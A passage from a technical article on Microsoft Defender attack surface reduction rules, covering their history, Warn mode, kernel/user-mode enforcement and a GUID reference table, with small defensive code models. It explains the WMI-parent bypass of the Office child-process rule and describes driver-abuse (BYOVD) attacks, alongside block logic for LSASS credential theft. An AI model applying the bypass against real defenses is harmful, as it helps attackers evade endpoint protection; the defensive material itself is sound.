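# Win32 process access rights, values as defined in winnt.h.
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

def refuse_lsass_handle(target_image: str, desired_access: int) -> bool:
    """Hypothetical predicate: refuse a handle to lsass.exe whenever the requested
    access mask includes the right to read the process's memory."""
    targets_lsass = PureWindowsPath(target_image).name.lower() == "lsass.exe"
    return targets_lsass and bool(desired_access & PROCESS_VM_READ)

lsass = r"C:\Windows\System32\lsass.exe"
print(refuse_lsass_handle(lsass, PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION))  # True
print(refuse_lsass_handle(lsass, PROCESS_QUERY_LIMITED_INFORMATION))                    # False
```

Keying on the access mask rather than the caller's identity is what lets tools that only query LSASS's state keep working in this model.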

Each rule is a direct response to a specific attacker move. The LSASS rule answers Mimikatz. The PSExec/WMI rule answers Emotet's lateral movement. The WMI persistence rule answers permanent-implant techniques that survive reboot through the WMI repository.

The PSExec/WMI rule (d1e49aac-...) is the textbook example of an ASR rule with high enterprise friction. Microsoft Configuration Manager (formerly SCCM) relies heavily on WMI; Microsoft Learn's overview page explicitly tells administrators not to set this rule to Block or Warn without extensive Audit-mode testing if Configuration Manager manages the device, "because the Configuration Manager client relies heavily on WMI" [@ms-learn-asr-overview]. Most large estates therefore run this rule in Audit indefinitely.

Generation 3, April 2020 -- Warn mode

Until 2020, the only choices for an ASR rule were Audit (logs only) and Block (the operation fails). The middle ground was a productivity problem: a power user whose legitimate IT-automation macro was being blocked had no recourse short of a help-desk ticket. The Microsoft Defender team's "Demystifying attack surface reduction rules - Part 1" Tech Community post, modified time April 22, 2020, announced the third mode -- Warn -- with a user-facing block dialog and a 24-hour per-user per-rule per-app exclusion cache [@techcommunity-demystifying-asr-part1].
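The exclusion cache the post describes can be modelled as a dictionary of timestamps. This is a sketch under stated assumptions: the key is exactly (user, rule, app), the window is a fixed 24 hours, and paths compare case-insensitively. The class, its methods, and the placeholder rule identifier are hypothetical.

```python
from datetime import datetime, timedelta

WARN_BYPASS_WINDOW = timedelta(hours=24)

class WarnBypassCache:
    """Hypothetical model of Warn mode's bypass memory, keyed per user, per rule, per app."""

    def __init__(self) -> None:
        self._granted: dict[tuple[str, str, str], datetime] = {}

    def record_bypass(self, user: str, rule_guid: str, app_path: str, now: datetime) -> None:
        # The user clicked through the Warn dialog for this exact (user, rule, app) triple.
        self._granted[(user, rule_guid, app_path.lower())] = now

    def is_bypassed(self, user: str, rule_guid: str, app_path: str, now: datetime) -> bool:
        granted = self._granted.get((user, rule_guid, app_path.lower()))
        return granted is not None and now - granted < WARN_BYPASS_WINDOW

cache = WarnBypassCache()
t0 = datetime(2026, 1, 5, 9, 0)
cache.record_bypass("alice", "example-rule-guid", r"C:\Tools\Report.exe", t0)
print(cache.is_bypassed("alice", "example-rule-guid", r"C:\Tools\Report.exe", t0 + timedelta(hours=23)))  # True
print(cache.is_bypassed("alice", "example-rule-guid", r"C:\Tools\Report.exe", t0 + timedelta(hours=25)))  # False
print(cache.is_bypassed("bob", "example-rule-guid", r"C:\Tools\Report.exe", t0 + timedelta(hours=1)))     # False
```

Scoping the bypass to the triple means one user's click-through never widens the exception for a colleague, another rule, or another application.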

Two precision facts deserve to be stated cleanly, because both contradict secondary-source folklore.

First, the platform prerequisite for Warn mode is Microsoft Defender Antivirus platform release 4.18.2008.9 (August 2020) or later, engine release 1.1.17400.5 or later [@ms-learn-asr-overview]. The older secondary-blog claim of "4.18.2001.10 / January 2020" is contradicted by Microsoft Learn's current canonical page and should not be repeated.

Second, exactly two ASR rules deliberately skip Warn mode and go straight from Audit to Block, not five. Microsoft Learn's overview page lists them verbatim: "Block credential stealing from the Windows local security authority subsystem" and "Block Office applications from injecting code into other processes" [@ms-learn-asr-overview]. The folklore that lists five no-Warn rules (sometimes including the Webshell rule, the Safe Mode reboot rule, and the copied-tools rule) is wrong. The rules reference page enumerates Warn-mode bypass ActionType variants for the Safe Mode reboot rule (AsrSafeModeRebootWarnBypassed) and the copied-tools rule (AsrAbusedSystemToolWarnBypassed) -- direct byte-level proof that those rules do support Warn [@ms-learn-asr-reference].

flowchart LR A["Audit - Log only, no enforcement"] --> W["Warn - User can bypass for 24h"] W --> B["Block - Operation fails"] A2["LSASS rule and Office injection rule"] --> A A2 --> B

The reason these two rules skip Warn is structural, not cosmetic. A low-privilege user cannot meaningfully consent to a process opening LSASS memory; the consent dialog would itself be a credential-theft enabler. Likewise, a non-admin user cannot rationally decide whether WINWORD.EXE should be allowed to inject shellcode into explorer.exe; the request encodes its own malice. The remaining seventeen rules support the full Audit, Warn, Block ladder.
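A deployment pipeline can enforce the two-rule exception before a policy ships. A sketch, assuming a hypothetical pre-deployment check: the numeric codes follow the values Defender's `Set-MpPreference -AttackSurfaceReductionRules_Actions` accepts (0 disabled, 1 block, 2 audit, 6 warn), and the Office-injection GUID comes from Microsoft Learn's rules reference rather than this article, so verify both against the current reference.

```python
from enum import IntEnum

class AsrAction(IntEnum):
    # Action codes as accepted by Set-MpPreference -AttackSurfaceReductionRules_Actions.
    DISABLED = 0
    BLOCK = 1
    AUDIT = 2
    WARN = 6

# The two rules that go straight from Audit to Block.
NO_WARN_RULES = {
    "9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2",  # Block credential stealing from LSASS
    "75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84",  # Block Office apps from injecting code (GUID from Microsoft Learn)
}

def validate(rule_guid: str, action: AsrAction) -> None:
    """Hypothetical check: reject a Warn assignment for rules that do not support it."""
    if action == AsrAction.WARN and rule_guid.lower() in NO_WARN_RULES:
        raise ValueError(f"{rule_guid} does not support Warn; use AUDIT or BLOCK")

validate("9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2", AsrAction.AUDIT)  # accepted
validate("d1e49aac-8f56-4280-b9ba-993a6d77406c", AsrAction.WARN)   # accepted
```

Failing at policy-authoring time is cheaper than discovering on endpoints that a Warn assignment never took effect.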

Generation 4a, December 2021 -- the BYOVD rule

The 2020-2022 era brought a new attacker move into mainstream incident response: Bring Your Own Vulnerable Driver, or BYOVD. The attacker imports a legitimate, signed, but vulnerable kernel driver, exploits its bug to gain kernel-mode primitives, uses those primitives to disable EDR and antivirus monitoring, and proceeds.

The in-the-wild record made the threat unambiguous, although its best-documented cases were published only after the rule shipped. Lazarus's autumn-2021 abuse of CVE-2021-21551 (Dell dbutil_2_3.sys) was the first recorded in-the-wild abuse of that driver, disclosed by ESET on September 30, 2022 [@welivesecurity-lazarus-byovd-2022] [@nvd-cve-2021-21551]. BlackByte's October 2022 abuse of CVE-2019-16098 (MSI Afterburner RTCore64.sys) was documented by Sophos with one of the year's defining lines: "disabling a whopping list of over 1,000 drivers on which security products rely to provide protection" [@sophos-blackbyte-returns-2022] [@nvd-cve-2019-16098].

BYOVD (Bring Your Own Vulnerable Driver): An attack pattern in which the operator imports a signed but exploitable kernel driver into the victim environment, exploits a known driver vulnerability to obtain kernel-mode primitives (typically arbitrary memory read or write), and uses those primitives to disable security telemetry. CVE-2021-21551 (Dell DBUtil) and CVE-2019-16098 (MSI Afterburner) are the canonical examples; the Sophos write-up of BlackByte's RTCore64.sys abuse documents disabling roughly one thousand security-product drivers [@nvd-cve-2021-21551] [@nvd-cve-2019-16098] [@sophos-blackbyte-returns-2022].

Microsoft launched the Vulnerable and Malicious Driver Reporting Center on December 8, 2021, explicitly naming the new ASR rule as the enforcement layer alongside the kernel-load-time Vulnerable Driver Blocklist [@ms-security-blog-vulnerable-driver-center]. The ASR rule is "Block abuse of exploited vulnerable signed drivers (Device)" -- GUID 56a863a9-875e-4185-98a7-b882c64b5ce5 [@ms-learn-asr-reference]. The Windows 11 22H2 release on September 20, 2022 [@windows-blog-windows-11-2022-update] made the Microsoft Vulnerable Driver Blocklist default-on for all devices, which is the kernel-load-time sibling to the ASR write-time block [@ms-learn-driver-block-rules].
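The write-time half of that pairing can be sketched as a hash lookup at the moment a file lands on disk. Everything here is an assumption: the blocklist holds a single stand-in hash, the function name is hypothetical, and real driver blocklists can also key on signer and file version, which this sketch ignores.

```python
import hashlib

# Hypothetical blocklist: one placeholder entry standing in for a known-vulnerable driver.
VULNERABLE_DRIVER_SHA256 = {
    hashlib.sha256(b"stand-in bytes for a known-vulnerable driver").hexdigest(),
}

def should_block_write(contents: bytes) -> bool:
    """Write-time check: refuse to let a process land a file whose hash is blocklisted."""
    return hashlib.sha256(contents).hexdigest() in VULNERABLE_DRIVER_SHA256

print(should_block_write(b"stand-in bytes for a known-vulnerable driver"))  # True
print(should_block_write(b"some other driver build"))                        # False
```

A driver already on disk never passes through this check, which is the gap the load-time blocklist covers.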

Generation 4b, February and July 2022 -- the parallel layer

This is the generation that deserves the most honest framing in the article, because the marketing version oversimplifies what actually happened to Office macros.

Tom Gallagher's February 7, 2022 Microsoft 365 Blog post announces the default block of VBA macros in MOTW-internet documents [@ms-techcommunity-internet-macros-2022]. The trust bar removes the "Enable Content" button entirely. Microsoft pauses the rollout on July 8, 2022 for usability adjustments, then resumes on July 20, 2022 -- both dates verifiable from the post's article:modified_time metadata. ESET's June 2022 write-up confirms the intended effect: between April 26 and May 2, 2022 Emotet operators were already testing LNK and ISO replacements for the macro carrier [@welivesecurity-emotet-pivot-2022].

A wide range of threat actors continue to target our customers by sending documents and luring them into enabling malicious macro code. -- Tom Gallagher, Partner Group Engineering Manager, Office Security, February 7, 2022 [@ms-techcommunity-internet-macros-2022]

The Microsoft 365 Apps default block is not a generation of ASR. It is a parallel layer that ships inside Office, runs against every Microsoft 365 Apps installation, managed or unmanaged, and uses the MOTW as its trigger rather than the kernel-mode minifilter. It cooperates with ASR; it does not subsume ASR.

The popular "ASR stopped Office macros" claim is half right. The Office-macro era ended through three layers in combination: (1) Europol's Operation LadyBird, the coordinated international takedown of Emotet's command-and-control infrastructure on January 27, 2021 [@europol-emotet-disrupted-wayback]; (2) ASR's 2017-onward Office rules at the enterprise tier, managed through Intune, Group Policy, or Defender for Endpoint; (3) the Microsoft 365 Apps internet-macro default block at the consumer and tenant tier, default-on for every Microsoft 365 installation since the July 2022 staged rollout [@ms-techcommunity-internet-macros-2022]. ASR is the enterprise-managed layer; it was not the only layer. The accurate version of the story names all three.

A coincidence worth noting: Europol's Operation LadyBird seized Emotet's command-and-control infrastructure on January 27, 2021 [@europol-emotet-disrupted-wayback]. SANS Internet Storm Center Diary 27036, published the same day by handler Daniel Wesemann, documented the canonical WMI-grandparent bypass to the Office-child-process ASR rule [@sans-isc-27036-emotet-asr]. A takedown and a bypass landed on the same Wednesday.
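The bypass can be reproduced in miniature with two simplified predicates. Both are hypothetical stand-ins (the real rules' logic is not published at this level) and the image paths are illustrative. A macro that asks WMI's `Win32_Process.Create` to start PowerShell makes WmiPrvSE.exe the observed parent, so a check keyed on an Office parent never fires, while a check keyed on the WMI provider host does.

```python
from pathlib import PureWindowsPath

def image_name(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def office_child_rule(parent: str, child: str) -> bool:
    # Simplified stand-in: fires only when an Office app is the direct parent.
    return image_name(parent) in {"winword.exe", "excel.exe", "powerpnt.exe"}

def psexec_wmi_rule(parent: str, child: str) -> bool:
    # Simplified stand-in: fires when the creator is the WMI provider host or PsExec's service.
    return image_name(parent) in {"wmiprvse.exe", "psexesvc.exe"}

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
direct = (r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", POWERSHELL)
# The macro asks WMI to start PowerShell, so the observed parent is WmiPrvSE.exe.
via_wmi = (r"C:\Windows\System32\wbem\WmiPrvSE.exe", POWERSHELL)

for name, edge in [("direct", direct), ("via WMI", via_wmi)]:
    print(name, office_child_rule(*edge), psexec_wmi_rule(*edge))
# direct True False
# via WMI False True
```

In this model only the PSExec/WMI rule sees the brokered spawn, which is why the Audit-only posture many estates adopt for that rule leaves the WMI path open.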

Generation 5, 2023-2026 -- Standard protection and the long tail

By 2023 Microsoft had enough deployment telemetry to partition the rules into two categories. The Standard protection rules are the three with a low false-positive floor, safe to enable in Block mode without staged rollout: BYOVD, LSASS credential-theft, and WMI persistence [@ms-learn-asr-overview]. The remaining sixteen are Other ASR rules and require the full Audit, Warn, Block ladder. Several new rules landed in this period [@ms-learn-asr-reference]:

Block Webshell creation for Servers -- a8f5898e-1dc8-49a9-9878-85004b8a61e6 -- the post-HAFNIUM / ProxyShell response. This is the only rule in the catalogue whose row in the Microsoft Learn reference shows "N" for EDR alerts, meaning it does not emit a paired Audited and Blocked ActionType in DeviceEvents. Defenders hunt blocked webshell drops through MpCmdRun.log and IIS access logs, not Advanced Hunting.
Block rebooting machine in Safe Mode -- 33ddedf1-c6e0-47cb-833e-de6133960387 -- the BlackByte-era safe-mode-encryption response.
Block use of copied or impersonated system tools -- c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb -- the rename-and-relocate evasion response (attackers copying cmd.exe to a writable path and renaming it update.exe).
Block untrusted and unsigned processes that run from USB -- b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 -- the BadUSB / removable-media response.
Block Office communication application from creating child processes -- 26190899-1602-49e8-8b27-eb1d0a1ce869 -- the Outlook variant of the Office-child-process rule.

Standard protection rules: The three ASR rules Microsoft classifies as safe to enable in Block mode without staged rollout: Block abuse of exploited vulnerable signed drivers, Block credential stealing from the Windows local security authority subsystem, and Block persistence through WMI event subscription. The classification appears verbatim on the ASR rules overview page [@ms-learn-asr-overview]. The LSASS rule is redundant when LSA Protection is enabled; the WMI persistence rule still requires Audit testing if Microsoft Configuration Manager manages the device.

The catalogue stands at 19 rules as of May 2026 -- three Standard protection rules and sixteen Other ASR rules, the count inclusive of the server-only Webshell rule that does not emit DeviceEvents [@ms-learn-asr-reference]. The pattern is consistent enough that the next section gives it a name.
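The Standard-protection partition translates directly into a rollout policy. A minimal sketch, assuming a hypothetical deployment script that picks each rule's first-stage mode per device; the function and its Configuration Manager flag are invented, and the GUIDs are the three given in this section.

```python
# Standard protection rules, with GUIDs as given in this article.
STANDARD_PROTECTION = {
    "56a863a9-875e-4185-98a7-b882c64b5ce5",  # Block abuse of exploited vulnerable signed drivers
    "9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2",  # Block credential stealing from LSASS
    "e6db77e5-3df2-4cf1-b95a-636979351e5b",  # Block persistence through WMI event subscription
}
WMI_PERSISTENCE = "e6db77e5-3df2-4cf1-b95a-636979351e5b"

def first_stage_mode(rule_guid: str, configmgr_managed: bool) -> str:
    """Hypothetical rollout helper: the mode a rule starts in on a given device."""
    guid = rule_guid.lower()
    if guid not in STANDARD_PROTECTION:
        return "Audit"  # Other ASR rules climb the Audit -> Warn -> Block ladder
    if guid == WMI_PERSISTENCE and configmgr_managed:
        return "Audit"  # still needs Audit testing where Configuration Manager manages the device
    return "Block"      # Standard protection: safe to block without staged rollout

print(first_stage_mode("56a863a9-875e-4185-98a7-b882c64b5ce5", configmgr_managed=True))   # Block
print(first_stage_mode("e6db77e5-3df2-4cf1-b95a-636979351e5b", configmgr_managed=True))   # Audit
print(first_stage_mode("d1e49aac-8f56-4280-b9ba-993a6d77406c", configmgr_managed=False))  # Audit
```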

5. Edges, Not Nodes

The structural pivot the whole article rests on can be written in one sentence: signatures classify nodes; AppLocker classifies identities; ASR classifies edges in the runtime graph. The rest of this section unpacks what that means and why it matters.

A node in the runtime graph is a binary or a file -- the kind of thing static analysis can fingerprint. An edge is a runtime relationship between two nodes: process A creating process B, process A writing file F, process A opening a handle to LSASS memory, the WMI repository writing a new __FilterToConsumerBinding. Signatures answer "is this node bad?" -- undecidable in general per Cohen 1984 [@cohen-1984-part1]. AppLocker answers "is this node's identity on the allow-list?" -- decidable but blind to LOLBin chains [@lolbas-project]. ASR answers "did this specific edge happen?" -- decidable per event at the OS interception layer.

The Cohen sidestep is precise. Cohen 1984 proved that classifying nodes ("is this program malicious?") is undecidable in general, via a reduction to the Halting Problem. He did not prove that classifying runtime edges is undecidable, because "did this specific parent-child invocation just happen?" is an observable proposition. The kernel sees the system call. The decision is local. No static analysis is required. ASR is the canonical industrial instantiation of that insight; every generation in Section 4 is a catalogue extension within the edge-classification approach, not a structural reframing of it.

Key idea: Signatures classify nodes. AppLocker classifies identities. ASR classifies edges in the runtime graph. By moving from node classification to edge classification, Microsoft sidesteps Cohen-1984 undecidability in the practical sense: you do not need to decide whether the binary is malicious, only whether the edge happened. The kernel sees the edge.

Where does the enforcement actually live? The "kernel-mediated" framing earns its phrasing in three precise pieces.

First, WdFilter.sys is the Microsoft Defender Antivirus minifilter driver. It is registered with the Windows Filter Manager in the FSFilter Anti-Virus altitude band (320000-329998), specifically at altitude 328010 per Microsoft's IFS allocated-altitudes reference [@ms-learn-ifs-allocated-altitudes]. It runs in kernel mode and intercepts process-creation, image-load, file-write, and (for some rules) WMI and registry edges through Filter Manager pre-operation callbacks and process / image-load notify routines.

Note: An altitude, in Windows Filter Manager terminology, is a string interpreted as a decimal number that determines the order in which file-system minifilters see I/O. Higher altitudes see I/O first on the way down to the file system and last on the way back up.
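A sketch of the ordering rule, assuming three filters attached to one volume: only WdFilter's altitude comes from Microsoft's list; the other two names and altitudes are invented for illustration. Python's `Decimal` is used because altitudes are strings interpreted as decimal numbers.

```python
from decimal import Decimal

# Filters attached to one volume. Only WdFilter's altitude is real; the others are invented.
FILTERS = {
    "WdFilter": "328010",
    "HypotheticalActivityMonitor": "385100",
    "HypotheticalEncryption": "141100",
}

def pre_operation_order(filters: dict[str, str]) -> list[str]:
    """Highest altitude first: the order filters see a request on its way down."""
    return sorted(filters, key=lambda name: Decimal(filters[name]), reverse=True)

def post_operation_order(filters: dict[str, str]) -> list[str]:
    """Lowest altitude first: the order filters see the completion on its way back up."""
    return list(reversed(pre_operation_order(filters)))

print(pre_operation_order(FILTERS))
# ['HypotheticalActivityMonitor', 'WdFilter', 'HypotheticalEncryption']
```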

WdFilter.sys: The Microsoft Defender Antivirus minifilter driver. Registered with the Windows Filter Manager at altitude 328010 in the FSFilter Anti-Virus band (320000-329998) per Microsoft's allocated-altitudes reference [@ms-learn-ifs-allocated-altitudes]. It runs in kernel mode and hosts the interception callbacks that ASR uses to see process-creation, image-load, and file-write edges before the user-mode actor completes the operation.

Second, MsMpEng.exe is the Defender Antivirus service process. It runs in user mode at integrity level System. For every intercepted edge it consults the per-rule predicate, the per-rule exclusion list, and (for cloud-protected rules) the Microsoft Active Protection Service reputation, then returns Audit, Warn, or Block. The kernel/user-mode split is structural, not accidental. Interception must happen in the kernel before the user-mode actor completes the call. But exclusion-list lookup and cloud reputation are not appropriate inside a minifilter that holds the IRP open.
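The evaluation order described above (exclusions, then the rule predicate, then the configured mode) can be sketched as a pure function. This is a hypothetical model, not MsMpEng.exe's code: it omits Warn mode and the MAPS cloud lookup, treats exclusions as matching the initiating image (which file an exclusion matches varies by rule), and builds the ActionType from a stem plus the Audited or Blocked suffix seen in DeviceEvents.

```python
from dataclasses import dataclass, field
from enum import Enum
from typing import Callable, Optional, Tuple

class Mode(Enum):
    AUDIT = "Audited"
    BLOCK = "Blocked"

@dataclass
class Rule:
    stem: str                          # hypothetical ActionType stem, e.g. "OfficeChildProcess"
    predicate: Callable[[dict], bool]  # does this edge match the rule?
    mode: Mode
    excluded_initiators: set = field(default_factory=set)  # lower-cased image paths

def evaluate(rule: Rule, edge: dict) -> Tuple[bool, Optional[str]]:
    """Return (allow_operation, ActionType to emit or None)."""
    # 1. Exclusions short-circuit before any rule logic runs.
    if edge["initiator"].lower() in rule.excluded_initiators:
        return True, None
    # 2. The per-rule predicate decides whether the edge is in scope at all.
    if not rule.predicate(edge):
        return True, None
    # 3. The configured mode turns a match into a verdict plus telemetry.
    return rule.mode is Mode.AUDIT, f"Asr{rule.stem}{rule.mode.value}"

is_word = lambda e: e["initiator"].lower().endswith("winword.exe")
rule = Rule("OfficeChildProcess", is_word, Mode.BLOCK)
print(evaluate(rule, {"initiator": r"C:\Office\WINWORD.EXE"}))  # (False, 'AsrOfficeChildProcessBlocked')
```

Keeping the verdict a pure function of rule configuration and edge data is what lets it live outside the kernel, in the user-mode half of the split.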

MsMpEng.exe: The Microsoft Defender Antivirus service process. Runs in user mode at integrity level System and hosts the policy-evaluation engine that decides Audit, Warn, or Block for every edge intercepted by `WdFilter.sys`. The two together form the kernel-mediated, user-mode-evaluated enforcement architecture that ASR relies on.

Third, telemetry. ASR blocks land in Defender for Endpoint's DeviceEvents Advanced Hunting table with a rule-specific ActionType such as AsrOfficeChildProcessBlocked or AsrLsassCredentialTheftBlocked. The rules reference enumerates a paired Audited and Blocked ActionType for every rule except the Webshell rule, which is the only one without a DeviceEvents row [@ms-learn-asr-reference]. The universal hunting query is `DeviceEvents | where ActionType startswith "Asr"`. The generic AsrRuleTriggered is folk wisdom; it appears nowhere in the rules reference.
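To see why equality against a generic value returns nothing while a prefix filter returns every ASR row, the same logic can be replayed over a few rows in Python. The rows are hypothetical, and the regular expression that splits an ActionType into rule stem and outcome is an assumption covering only the suffixes named in this article (Audited, Blocked, WarnBypassed).

```python
import re

# Hypothetical DeviceEvents rows, reduced to the ActionType column.
ROWS = [
    {"ActionType": "AsrOfficeChildProcessBlocked"},
    {"ActionType": "AsrLsassCredentialTheftAudited"},
    {"ActionType": "AsrSafeModeRebootWarnBypassed"},
    {"ActionType": "AntivirusDetection"},
]

# Assumed shape: "Asr" + rule stem + outcome suffix.
ASR_ACTION = re.compile(r"^Asr(?P<rule>\w+?)(?P<outcome>Audited|Blocked|WarnBypassed)$")

def asr_rows(rows):
    """Python analogue of: DeviceEvents | where ActionType startswith "Asr"."""
    return [r for r in rows if r["ActionType"].startswith("Asr")]

def split_action_type(action_type):
    """Return (rule stem, outcome), or None if the string does not fit the assumed shape."""
    m = ASR_ACTION.match(action_type)
    return (m["rule"], m["outcome"]) if m else None

print(len([r for r in ROWS if r["ActionType"] == "AsrRuleTriggered"]))  # 0
for row in asr_rows(ROWS):
    print(split_action_type(row["ActionType"]))
# ('OfficeChildProcess', 'Blocked')
# ('LsassCredentialTheft', 'Audited')
# ('SafeModeReboot', 'WarnBypassed')
```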

Advanced Hunting: Microsoft Defender for Endpoint's Kusto Query Language (KQL) surface over endpoint telemetry. ASR blocks and audit events land in the `DeviceEvents` table with rule-specific `ActionType` values. Defenders combine `DeviceEvents` with `DeviceProcessEvents`, `DeviceFileEvents`, and `DeviceImageLoadEvents` to assemble the corroborating edge data around any ASR row [@ms-learn-asr-reference].

Figure: the ASR enforcement path. WINWORD.EXE calls CreateProcessW -> Windows kernel process-creation notify -> WdFilter.sys (kernel-mode minifilter, altitude 328010) sends an edge event -> MsMpEng.exe (user-mode service: rule predicate + exclusions + MAPS) returns Audit / Warn / Block -> WdFilter.sys fails or allows the CreateProcessW. MsMpEng.exe also emits telemetry to DeviceEvents (ActionType = AsrOfficeChildProcessBlocked).

A common misconception is "ASR runs in the kernel." That is partially true and structurally incomplete. The interception point is kernel-mode; the policy evaluation is user-mode. Both are necessary. The kernel must see the edge before the user-mode actor completes the operation, but the cloud reputation lookup and the per-rule exclusion list are not appropriate to run inside a minifilter that holds the IRP open. The correct one-line framing is "kernel-mediated interception, user-mode policy evaluation."
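To make the split concrete, here is a minimal JavaScript model of the enforcement path described above. It is a sketch, not a description of Defender internals: `interceptProcessCreate` stands in for the WdFilter.sys callout that holds the operation, `evaluateEdge` stands in for MsMpEng.exe's predicate-plus-exclusions check, and every function name, event field, and the Office image list are hypothetical. No cloud (MAPS) lookup is modelled.

```javascript
// Hypothetical model of "kernel-mediated interception, user-mode policy evaluation".
// Function names, event fields, and the Office image list are illustrative only;
// they are not Windows, Filter Manager, or Defender APIs.
const OFFICE_IMAGES = new Set(["winword.exe", "excel.exe", "powerpnt.exe"]);

// User-mode side (stands in for MsMpEng.exe): rule predicate, then exclusions, then mode.
function evaluateEdge(edge, policy) {
  const parent = edge.parentImage.toLowerCase();
  const child = edge.childPath.toLowerCase();
  if (!OFFICE_IMAGES.has(parent)) return "Allow"; // predicate false
  if (policy.exclusions.some(p => child.startsWith(p.toLowerCase()))) return "Allow"; // excluded
  return policy.mode; // "Audit" | "Warn" | "Block"
}

// Kernel side (stands in for the WdFilter.sys callout): the operation waits for
// the user-mode verdict, then is either failed or allowed to complete.
function interceptProcessCreate(edge, policy, telemetry) {
  const verdict = evaluateEdge(edge, policy);
  if (verdict !== "Allow") telemetry.push({ verdict, ...edge });
  if (verdict === "Block") return "deny";
  if (verdict === "Warn") return edge.userBypassedWarning ? "allow" : "deny";
  return "allow"; // "Allow" and "Audit" both let the operation complete
}

const telemetry = [];
const policy = { mode: "Block", exclusions: [] };
console.log(interceptProcessCreate(
  { parentImage: "WINWORD.EXE", childPath: "C:\\Windows\\System32\\cmd.exe" }, policy, telemetry)); // deny
console.log(interceptProcessCreate(
  { parentImage: "explorer.exe", childPath: "C:\\Windows\\System32\\cmd.exe" }, policy, telemetry)); // allow
console.log(telemetry.length); // 1
```

Audit mode shows why the split matters operationally: the verdict still produces telemetry, but the kernel side lets the operation complete.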

The marginal performance cost of an ASR check is small because ASR rides on the WdFilter.sys callout that already runs for real-time scanning: it piggybacks on interception the antivirus engine has already paid for. Microsoft has not published a figure isolating ASR per-event overhead from broader minifilter cost. The closest published reference, the IFS allocated-altitudes page [@ms-learn-ifs-allocated-altitudes], establishes where WdFilter.sys sits in the filter stack but gives no timing data. Any sub-microsecond-per-event estimate is therefore inferred from the architecture, not measured.

"Protection from denial of services requires the detection of halting programs which is well known to be undecidable." -- Fred Cohen, "Computer Viruses: Theory and Experiments," 1984 [@cohen-1984-part1]

The framework now in place is "name a behaviour class, ship an enforcement edge." Nine years and seven generations of catalogue extension have followed that single rule. So what does the catalogue look like in detail today? The next section is the reference table: nineteen rules, organised by category, with GUID, ActionType, and the attacker behaviour each one closes.

6. The Nineteen Rules in Detail

This section is the article's reference table. Not a deployment guide (that comes in Section 10), but a catalogue to return to when you need to remember which GUID maps to which behaviour and which ActionType lands in DeviceEvents. Every row is from Microsoft Learn's rules reference page [@ms-learn-asr-reference].

Standard protection rules (3 rules)

Microsoft itself recommends enabling these three in Block mode without staged rollout, because their false-positive floor is low [@ms-learn-asr-overview].

Short name	GUID	ActionType (Blocked)	Notes
Block abuse of exploited vulnerable signed drivers	`56a863a9-875e-4185-98a7-b882c64b5ce5`	`AsrVulnerableSignedDriverBlocked`	The BYOVD response; pairs with the kernel-load-time Vulnerable Driver Blocklist [@ms-learn-driver-block-rules]
Block credential stealing from the Windows local security authority subsystem	`9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2`	`AsrLsassCredentialTheftBlocked`	Redundant when LSA Protection is enabled [@ms-learn-asr-overview]
Block persistence through WMI event subscription	`e6db77e5-3df2-4cf1-b95a-636979351e5b`	`AsrPersistenceThroughWmiBlocked`	Still requires Audit testing if Configuration Manager manages the device

Productivity apps (6 rules)

The Office and Adobe response pack, anchored by the Office-child-process rule that opens this article.

Short name	GUID	ActionType (Blocked)	Notes
Block all Office applications from creating child processes	`d4f940ab-401b-4efc-aadc-ad5f3c50688a`	`AsrOfficeChildProcessBlocked`	The macro-to-PowerShell stopper
Block Office applications from creating executable content	`3b576869-a4ec-4529-8536-b80a7769e899`	`AsrExecutableOfficeContentBlocked`	Blocks dropped EXEs from Office processes
Block Office applications from injecting code into other processes	`75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84`	`AsrOfficeProcessInjectionBlocked`	No Warn-mode support [@ms-learn-asr-overview]
Block Win32 API calls from Office macros	`92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b`	`AsrOfficeMacroWin32ApiCallsBlocked`	Refuses `Declare` statements that bind to native DLLs
Block Office communication application from creating child processes	`26190899-1602-49e8-8b27-eb1d0a1ce869`	`AsrOfficeCommAppChildProcessBlocked`	The Outlook variant
Block Adobe Reader from creating child processes	`7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c`	`AsrAdobeReaderChildProcessBlocked`	The PDF response

Scripts and email (3 rules)

The AMSI-backed script-content rules plus the email-drop-execution rule.

Short name	GUID	ActionType (Blocked)	Notes
Block execution of potentially obfuscated scripts	`5beb7efe-fd9a-4556-801d-275e5ffc04cc`	`AsrObfuscatedScriptBlocked`	AMSI-backed
Block JavaScript or VBScript from launching downloaded executable content	`d3e037e1-3eb8-44c8-a917-57927947596d`	`AsrScriptExecutableDownloadBlocked`	The drive-by-download response
Block executable content from email client and webmail	`be9ba2d9-53ea-4cdc-84e5-9b1eeee46550`	`AsrExecutableEmailContentBlocked`	Catches the dropped-attachment-run pattern

Lateral movement and prevalence (4 rules)

The cloud-protected, prevalence-based rules plus the Emotet lateral-movement responses.

Short name	GUID	ActionType (Blocked)	Notes
Block process creations originating from PSExec and WMI commands	`d1e49aac-8f56-4280-b9ba-993a6d77406c`	`AsrPsexecWmiChildProcessBlocked`	Conflicts with Configuration Manager [@ms-learn-asr-overview]
Block executable files from running unless they meet a prevalence, age, or trusted list criterion	`01443614-cd74-433a-b99e-2ecdc07bfc25`	`AsrUntrustedExecutableBlocked`	Requires cloud protection (MAPS)
Block untrusted and unsigned processes that run from USB	`b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4`	`AsrUntrustedUsbProcessBlocked`	The BadUSB response
Use advanced protection against ransomware	`c1db55ab-c21a-4637-bb3f-a12568109d35`	`AsrRansomwareBlocked`	Requires cloud protection

Server, system-tool, and safe-mode (3 rules)

The post-2022 additions.

Short name	GUID	ActionType (Blocked)	Notes
Block Webshell creation for Servers	`a8f5898e-1dc8-49a9-9878-85004b8a61e6`	(no DeviceEvents pair)	Only rule without a `DeviceEvents` ActionType [@ms-learn-asr-reference]
